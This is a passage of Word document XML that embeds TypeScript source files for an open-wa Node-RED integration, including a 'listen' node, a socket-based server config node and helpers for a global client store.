          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            promWithHandler()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 config node configured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.error("No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RED.nodes.registerType("cmd", CmdNodeConstructor);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nodeInit;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integrations/node-red/src/nodes/cmd/cmd.ts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integrations/node-red/src/nodes/listen/listen.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { OwaServerNode } from './../owa-server/modules/types';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeContextData, NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ListenNode, ListenNodeDef } from "./modules/types";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ClientStore, CLIENT_STORE } from '../shared/types';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">type Message = Record&lt;string, unknown&gt;;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nodeInit: NodeInitializer = (RED): void =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function ListenNodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: ListenNode,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: ListenNodeDef</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RED.nodes.createNode(this, config);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.name = config.name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.listener = config.listener;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let listenerSet = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.listenerFn = (message: Message) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.send({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        payload: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(config.server) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.server = RED.nodes.getNode(config.server) as OwaServerNode;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const client = () =&gt; getSocket(this.context().global, config.server);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RED.httpAdmin.get("/node_red_init_listen", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!this.server?.client.socket) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return "Please set a server first!"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this.server?.client.socket.emit("node_red_init_listen", (data: unknown) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            res.json(data)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console.log(error);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registerCallback = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (listenerSet) return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (this.callbackId) client()?.stopListener(this.listener, this.callbackId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        client()?.listen(this.listener, this.listenerFn).then(callbackId =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          this.callbackId = callbackId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          listenerSet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(config.server)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (this.server) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (client()?.socket.connected) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            registerCallback();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            this.status({ fill: 'green', shape: 'dot', text: 'listening'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this.status({ fill: 'red', shape: 'ring', text: 'not connected'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 No config node configured  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          this.status({ fill: 'red', shape: 'ring', text: 'No Server!' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          this.error("No Server!")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this.server.addListener("connected", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({ fill: 'green', shape: 'dot', text: 'listening' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        registerCallback();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this.server.addListener("disconnect", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({ fill: 'red', shape: 'ring', text: 'Disconnected!'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this.server.addListener("connect_error", () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({ fill: 'red', shape: 'ring', text: 'Disconnected!'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this.on('close', (done: () =&gt; void) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        listenerSet = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        client()?.stopListener(this.listener, this.callbackId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({});</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RED.nodes.registerType("listen", ListenNodeConstructor);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getSocket = (globalContext: NodeContextData, socketId: string) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  let store: ClientStore = globalContext.get(CLIENT_STORE) as ClientStore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (!store) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //create global client store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    globalContext.set(CLIENT_STORE,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 globalContext.get(CLIENT_STORE) as ClientStore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  return store[socketId];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nodeInit;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integrations/node-red/src/nodes/listen/listen.ts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integrations/node-red/src/nodes/owa-server/owa-server.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { SocketClient } from "@open-wa/socket-client";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { NodeContextData, NodeInitializer } from "node-red";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ClientStore, CLIENT_STORE } from '../shared/types';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { OwaServerNode, OwaServerNodeDef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nodeInit: NodeInitializer = async (RED): Promise&lt;void&gt; =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  function OwaServerNodeConstructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this: OwaServerNode,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: OwaServerNodeDef</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global socket store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * var globalContext = this.context().global;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RED.nodes.createNode(this, config);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.name = config.name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.url = config.url;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.key = config.key;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.client = new SocketClient(this.url,this.key);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.clientSocket = this.client.socket;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    addSocketClientToGlobalStore(this.context().global, this.id, this.client)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this.clientSocket.on('connect', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.emit('connected')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.send({ payload: { socketId: this.name, status: 'connected' } });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.status({ fill: "green", shape: "dot", text: "connected"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this.clientSocket.on('disconnect', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.emit('disconnect')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      removeSocketClientFromGlobalStore(this.context().global, this.id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.send({ payload: { socketId: this.name, status: 'disconnected' } });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.status({ fill: 'red', shape: 'ring', text: 'disconnected'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this.clientSocket.on('connect_error', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.emit('connect_error')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (err) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.status({ fill: 'red', shape: 'ring', text: 'disconnected' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.send({ payload: { socketId: this.name, status: 'disconnected'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this.on('close', (removed : boolean, done : () =&gt; void) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.clientSocket.disconnect();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      this.status({});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (removed) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        removeSocketClientFromGlobalStore(this.context().global, this.id)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RED.nodes.registerType("owa-server", OwaServerNodeConstructor);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getSocketStore = (globalContext : NodeContextData) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  let store : ClientStore = globalContext.get(CLIENT_STORE) as ClientStore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if(!store) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //create global client store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      globalContext.set(CLIENT_STORE,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 = globalContext.get(CLIENT_STORE) as ClientStore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  return store;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addSocketClientToGlobalStore = (globalContext : NodeContextData, socketClientId : string, socketClient: SocketClient) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const store = getSocketStore(globalContext)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if(store[socketClientId]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //client already exists</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globalContext.set(CLIENT_STORE, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      ...store,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      [socketClientId] : socketClient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removeSocketClientFromGlobalStore = (globalContext : NodeContextData, socketClientId : string) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
